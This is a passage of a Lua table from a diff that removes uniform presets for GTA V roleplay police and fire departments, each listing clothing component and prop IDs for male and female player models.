}, - components = { - { 1, 1, 1 }, - { 11, 191, 9 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 88, 13 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 26, 2 }, - { 5, 33, 1 }, - } - }, - ['Female PAP Harbor Class B'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 9 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 66, 1 }, - { 4, 91, 13 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 28, 2 }, - { 5, 33, 1 }, - } - }, - ['Female PAP Harbor Class C'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 9 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 66, 1 }, - { 4, 91, 13 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 28, 2 }, - { 5, 33, 1 }, - } - }, - ['Male PAP Winter Uniform'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 124, 2 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 27, 1 }, - { 5, 49, 1 }, - } - }, - ['Female PAP Winter Uniform'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 120, 2 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 29, 1 }, - { 5, 49, 1 }, - } - }, - ['Male RHPD Class A'] = { - category = 'RHPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 14 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 73, 1 }, - } - }, - ['Male RHPD Class B'] = { - category = 'RHPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 14 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 73, 1 }, - } - }, - ['Male RHPD Class C'] = { - category = 'RHPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 14 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 73, 1 }, - } - }, - ['Female RHPD Class A'] = { - category = 'RHPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 14 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 73, 1 }, - } - }, - ['Female RHPD Class B'] = { - category = 'RHPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 14 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 73, 1 }, - } - }, - ['Female RHPD Class C'] = { - category = 'RHPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 14 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 73, 1 }, - } - }, - ['Male DPPD Class A'] = { - category = 'DPPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 15 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 74, 1 }, - } - }, - ['Male DPPD Class B'] = { - category = 'DPPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 15 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 74, 1 }, - } - }, - ['Male DPPD Class C'] = { - category = 'DPPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 15 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 74, 1 }, - } - }, - ['Female DPPD Class A'] = { - category = 'DPPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 15 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 74, 1 }, - } - }, - ['Female DPPD Class B'] = { - category = 'DPPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 15 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 74, 1 }, - } - }, - ['Female DPPD Class C'] = { - category = 'DPPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 15 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 74, 1 }, - } - }, - ['Male LSFD Bunker Pants'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 1, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 15 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 20, 2 }, - { 6, 52, 1 }, - { 7, 19, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male LSFD Turnouts'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 81, 1 }, - { 3, 97, 1 }, - { 10, 17, 1 }, - { 8, 16, 1 }, - { 4, 44, 1 }, - { 6, 14, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSFD PPE Gear'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 46, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 78, 1 }, - { 3, 97, 1 }, - { 10, 17, 1 }, - { 8, 69, 1 }, - { 4, 44, 1 }, - { 6, 14, 1 }, - { 7, 46, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSFD Bunker Pants'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 225, 22 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 49, 2 }, - { 6, 53, 1 }, - { 7, 13, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSFD Turnouts'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 1 }, - { 3, 112, 1 }, - { 10, 16, 1 }, - { 8, 15, 1 }, - { 4, 19, 1 }, - { 6, 29, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSFD PPE Gear'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 45, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 65, 1 }, - { 3, 112, 1 }, - { 10, 16, 1 }, - { 8, 49, 1 }, - { 4, 19, 1 }, - { 6, 29, 1 }, - { 7, 33, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSCoFD Bunker Pants'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 17 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 20, 1 }, - { 6, 52, 1 }, - { 7, 19, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male LSCoFD Turnouts'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 81, 2 }, - { 3, 97, 1 }, - { 10, 18, 1 }, - { 8, 16, 1 }, - { 4, 44, 2 }, - { 6, 14, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSCoFD PPE Gear'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 46, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 78, 2 }, - { 3, 97, 1 }, - { 10, 18, 1 }, - { 8, 69, 1 }, - { 4, 44, 2 }, - { 6, 14, 1 }, - { 7, 46, 2 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSCoFD Bunker Pants'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 225, 23 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 49, 1 }, - { 6, 53, 1 }, - { 7, 13, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSCoFD Turnouts'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 2 }, - { 3, 112, 1 }, - { 10, 17, 1 }, - { 8, 15, 1 }, - { 4, 19, 2 }, - { 6, 29, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSCoFD PPE Gear'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 45, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 65, 2 }, - { 3, 112, 1 }, - { 10, 17, 1 }, - { 8, 49, 1 }, - { 4, 19, 2 }, - { 6, 29, 1 }, - { 7, 33, 2 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCFD Bunker Pants'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 16 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 20, 2 }, - { 6, 52, 1 }, - { 7, 19, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male BCFD Turnouts'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 81, 1 }, - { 3, 97, 1 }, - { 10, 19, 1 }, - { 8, 16, 1 }, - { 4, 44, 1 }, - { 6, 14, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCFD PPE Gear'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 46, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 78, 1 }, - { 3, 97, 1 }, - { 10, 19, 1 }, - { 8, 69, 1 }, - { 4, 44, 1 }, - { 6, 14, 1 }, - { 7, 46, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCFD Bunker Pants'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 225, 24 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 49, 1 }, - { 6, 53, 1 }, - { 7, 13, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCFD Turnouts'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 1 }, - { 3, 112, 1 }, - { 10, 18, 1 }, - { 8, 15, 1 }, - { 4, 19, 1 }, - { 6, 29, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCFD PPE Gear'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 45, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 65, 1 }, - { 3, 112, 1 }, - { 10, 18, 1 }, - { 8, 49, 1 }, - { 4, 19, 1 }, - { 6, 29, 1 }, - { 7, 33, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSFD Fireman Class A'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 119, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 38, 5 }, - } - }, - ['Male LSFD Fireman Class B'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 2 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 71, 2 }, - } - }, - ['Male LSFD Fireman Class C'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 2 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 71, 2 }, - } - }, - ['Female LSFD Fireman Class A'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 38, 5 }, - } - }, - ['Female LSFD Fireman Class B'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 2 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 71, 2 }, - } - }, - ['Female LSFD Fireman Class C'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 2 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 71, 2 }, - } - }, - ['Male LSFD EMT Class B'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 1 }, - { 3, 87, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 31, 4 }, - { 9, 30, 1 }, - { 5, 71, 1 }, - } - }, - ['Male LSFD EMT Class C'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 1 }, - { 3, 86, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 31, 4 }, - { 9, 30, 1 }, - { 5, 71, 1 }, - } - }, - ['Male LSFD T-Shirt'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 15 }, - { 3, 86, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 30, 1 }, - { 5, 1, 1 }, - } - }, - ['Female LSFD EMT Class B'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 1 }, - { 3, 102, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 15, 4 }, - { 9, 34, 1 }, - { 5, 71, 1 }, - } - }, - ['Female LSFD EMT Class C'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 1 }, - { 3, 110, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 15, 4 }, - { 9, 34, 1 }, - { 5, 71, 1 }, - } - }, - ['Female LSFD T-Shirt'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 225, 22 }, - { 3, 110, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 34, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSFD Jacket'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 152, 3 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 7 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSFD Jacket'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 149, 3 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 7 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSFD Winter Jacket'] = { - category = 'LSFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 250, 2 }, - { 3, 32, 1 }, - { 10, 58, 1 }, - { 8, 16, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 127, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSFD Winter Jacket'] = { - category = 'LSFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 258, 2 }, - { 3, 37, 1 }, - { 10, 66, 1 }, - { 8, 15, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 97, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male LSCoFD Fireman Class A'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 119, 3 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 38, 2 }, - } - }, - ['Male LSCoFD Fireman Class B'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 3 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 38, 2 }, - } - }, - ['Male LSCoFD Fireman Class C'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 3 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 38, 2 }, - } - }, - ['Female LSCoFD Fireman Class A'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 3 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 38, 2 }, - } - }, - ['Female LSCoFD Fireman Class B'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 4 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 38, 2 }, - } - }, - ['Female LSCoFD Fireman Class C'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 4 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 38, 2 }, - } - }, - ['Male LSCoFD EMT Class B'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 4 }, - { 3, 87, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 31, 2 }, - { 9, 1, 1 }, - { 5, 38, 1 }, - } - }, - ['Male LSCoFD EMT Class C'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 4 }, - { 3, 86, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 31, 2 }, - { 9, 30, 1 }, - { 5, 38, 1 }, - } - }, - ['Male LSCoFD T-Shirt'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 17 }, - { 3, 86, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 30, 1 }, - { 5, 1, 1 }, - } - }, - ['Female LSCoFD EMT Class B'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 3 }, - { 3, 102, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 15, 1 }, - { 9, 1, 1 }, - { 5, 38, 1 }, - } - }, - ['Female LSCoFD EMT Class C'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 3 }, - { 3, 110, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 